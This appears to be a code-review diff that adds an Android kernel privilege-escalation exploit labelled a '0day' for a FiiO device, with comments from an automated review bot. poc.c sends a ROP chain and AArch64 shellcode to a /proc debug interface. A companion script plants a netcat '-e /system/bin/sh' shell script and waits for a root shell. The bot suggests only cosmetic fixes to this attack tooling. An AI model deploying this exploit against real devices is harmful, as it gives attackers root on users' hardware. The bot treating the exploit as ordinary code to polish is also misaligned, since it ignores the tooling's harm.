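--- a/fiio_LPE_0day/Makefile
+++ b/fiio_LPE_0day/Makefile
@@ -0,0 +1,36 @@
+# Makefile for CVE-2019-2215
+#
+# NDK_ROOT=/home/ashfaq/Android/Sdk/ndk/21.0.6113669 make
+#
+
+CXXFLAGS := -static -O3 -Wall -Wextra -g
+
+#CROSS_COMPILE := $(HOME)/Android/Sdk/ndk/25.1.8937393/toolchains/llvm/prebuilt/linux-x86_64/bin
+CROSS_COMPILE := $(HOME)/Downloads/android-ndk-r22b/toolchains/llvm/prebuilt/linux-x86_64/bin
+TARGET_PLATFORM := $(ARCH)-linux-android
+CXX_PATH := $(CROSS_COMPILE)/aarch64-linux-android30-clang++
+
+TRIGGER_SRC := poc.c
+TRIGGER_OUTPUT := poc
+
+# default rule
+default: all
+
+# phony rules
+.PHONY: all
+
+all: clean build-trigger push-trigger
+
+build-trigger:
+ @echo Building: $(TRIGGER_OUTPUT)
+ @$(CXX_PATH) $(CXXFLAGS) -o $(TRIGGER_OUTPUT) $(TRIGGER_SRC)
+
+clean:
+ @echo Removing: $(TRIGGER_OUTPUT)
+ @rm -f $(TRIGGER_OUTPUT)
+
+push-trigger:
+ @echo Pushing: $(TRIGGER_OUTPUT) to /data/local/tmp
+ @adb push $(TRIGGER_OUTPUT) /data/local/tmp
+
+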
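Review bot: `.PHONY` names only `all`, although `default`, `clean`, `build-trigger` and `push-trigger` are command targets too, and `all: clean build-trigger push-trigger` relies on its prerequisites running in file order, which `make -j` does not guarantee, so `clean` can run after the build. Declare `.PHONY: default all clean build-trigger push-trigger` and make the ordering explicit with `build-trigger: clean` and `push-trigger: build-trigger`. `TARGET_PLATFORM` is derived from `$(ARCH)`, which is never defined, and is never used, while `CXX_PATH` hard-codes `aarch64-linux-android30-clang++`; one of the two should go. The recipe lines under `build-trigger`, `clean` and `push-trigger` appear with a single leading space in this rendering; if the file really uses spaces rather than a tab, make stops with "missing separator". The header comment names CVE-2019-2215, which does not appear to describe what `poc.c` in this commit does, so it should be corrected or dropped.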
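--- a/fiio_LPE_0day/exploit
+++ b/fiio_LPE_0day/exploit
@@ -0,0 +1,13 @@
+echo "[+] Creating malicious script at /data/local/tmp/cmd..."
+echo "#!/system/bin/sh" >> /data/local/tmp/cmd
+echo "/system/bin/busybox1.11 nc 127.0.0.1 4444 -e /system/bin/sh" >> /data/local/tmp/cmd
+chmod 777 cmd
+
+echo "[+] Starting exploit..."
+/data/local/tmp/poc 2>/dev/null
+sleep 5
+
+echo "[+] Launching listener..."
+echo "[!] Wait for r00t shell..."
+/system/bin/busybox1.11 nc -lp 4444
+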
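Review bot: The script has no interpreter line and no header comment, so which shell it expects and which files it leaves on the device are undocumented. Add `#!/system/bin/sh` as the first line and a comment such as `# Appends to /data/local/tmp/cmd, runs /data/local/tmp/poc, then listens on TCP 4444` so the artifacts it creates are visible to anyone reviewing the repository or analysing a device it was run on.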
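--- a/fiio_LPE_0day/poc.c
+++ b/fiio_LPE_0day/poc.c
@@ -0,0 +1,112 @@
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <iostream>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <spawn.h>
+
+uint64_t kernel_base = 0xFFFFFFC000080000ULL;
+uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;
+uint64_t nop = 0xd503201fd503201f;
+uint64_t junk = 0x4242424242424242;
+
+static int win() {
+ puts("[+] Returned from supervisor mode\n");
+ return 0;
+}
+
+
+static int exploit() {
+ int fd;
+ fd = open("/proc/ftxxxx-debug", O_RDWR);
+ unsigned char buf[4096];
+ memset(buf, 0x41, 1);
+ memset(buf+1, 0x0, 1023);
+
+ uint64_t stack_size = 0x1000;
+ void *stack_base = mmap(NULL, stack_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
+ if(stack_base == MAP_FAILED) {
+ puts("[!] mmap failed!");
+ return -1;
+ }
+
+ void *stack_top = (void *)((uint64_t)stack_base + stack_size);
+
+
+ unsigned char shellcode[] = {
+ 0x02, 0xf9, 0x98, 0xd2, 0x42, 0x18, 0xa0, 0xf2,
+ 0x02, 0xf8, 0xdf, 0xf2, 0xe2, 0xff, 0xff, 0xf2,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x00, 0x00, 0x39,
+ 0x83, 0x0c, 0x80, 0x52, 0x43, 0x04, 0x00, 0x39,
+ 0x23, 0x0c, 0x80, 0x52, 0x43, 0x08, 0x00, 0x39,
+ 0x83, 0x0e, 0x80, 0x52, 0x43, 0x0c, 0x00, 0x39,
+ 0x23, 0x0c, 0x80, 0x52, 0x43, 0x10, 0x00, 0x39,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x14, 0x00, 0x39,
+ 0x83, 0x0d, 0x80, 0x52, 0x43, 0x18, 0x00, 0x39,
+ 0xe3, 0x0d, 0x80, 0x52, 0x43, 0x1c, 0x00, 0x39,
+ 0x63, 0x0c, 0x80, 0x52, 0x43, 0x20, 0x00, 0x39,
+ 0x23, 0x0c, 0x80, 0x52, 0x43, 0x24, 0x00, 0x39,
+ 0x83, 0x0d, 0x80, 0x52, 0x43, 0x28, 0x00, 0x39,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x2c, 0x00, 0x39,
+ 0x83, 0x0e, 0x80, 0x52, 0x43, 0x30, 0x00, 0x39,
+ 0xa3, 0x0d, 0x80, 0x52, 0x43, 0x34, 0x00, 0x39,
+ 0x03, 0x0e, 0x80, 0x52, 0x43, 0x38, 0x00, 0x39,
+ 0xe3, 0x05, 0x80, 0x52, 0x43, 0x3c, 0x00, 0x39,
+ 0x63, 0x0c, 0x80, 0x52, 0x43, 0x40, 0x00, 0x39,
+ 0xa3, 0x0d, 0x80, 0x52, 0x43, 0x44, 0x00, 0x39,
+ 0x83, 0x0c, 0x80, 0x52, 0x43, 0x48, 0x00, 0x39,
+ 0xe3, 0x03, 0x1f, 0xaa, 0x43, 0x30, 0x01, 0xf8,
+ 0xa2, 0x02, 0x02, 0xd1, 0x41, 0x00, 0x40, 0xf9,
+ 0x44, 0x04, 0x40, 0xf9, 0xe0, 0x03, 0x1f, 0xaa,
+ 0x04, 0x41, 0x18, 0xd5, 0x21, 0x40, 0x18, 0xd5,
+ 0x00, 0x40, 0x18, 0xd5, 0xe0, 0x03, 0x9f, 0xd6,
+ };
+
+
+ uint64_t *chain = (uint64_t *)&buf[1024];
+ *chain++ = (uint64_t)blr_x21;
+ *chain++ = (uint64_t)junk;
+ *chain++ = (uint64_t)junk;
+ *chain++ = (uint64_t)junk;
+ *chain++ = ((uint64_t)&win +0x8);
+ *chain++ = (uint64_t)((uint64_t)&stack_top);
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ *chain++ = (uint64_t)nop;
+ memcpy(buf + 1216, shellcode, sizeof(shellcode));
+
+ puts("[+] Ropping to shellcode...");
+ write(fd, buf, 1024 + 1216 + sizeof(shellcode));
+ puts("[-] Something went wrong...\n");
+ return 0;
+}
+
+int main() {
+ std::cout << "[+] Starting trigger...\n";
+ exploit();
+ return 0;
+}
+
+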
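Review bot: In `exploit()` the result of `open("/proc/ftxxxx-debug", O_RDWR)` is never checked and `fd` is never closed, so when the open fails the code goes on to `write(fd, ...)` with -1 and only the generic "Something went wrong" message is printed; add `if (fd < 0) { perror("open"); return -1; }` right after the open and close the descriptor before returning. `uint64_t` is used throughout without including `<stdint.h>`/`<cstdint>`, relying on a transitive include, and `<unistd.h>` and `<sys/types.h>` are each included twice. The file is named `poc.c` but uses `<iostream>` and `std::cout` in `main()`, and the Makefile builds it with clang++; either rename it to `.cpp` or replace `std::cout` with `puts` so the extension, includes and toolchain agree.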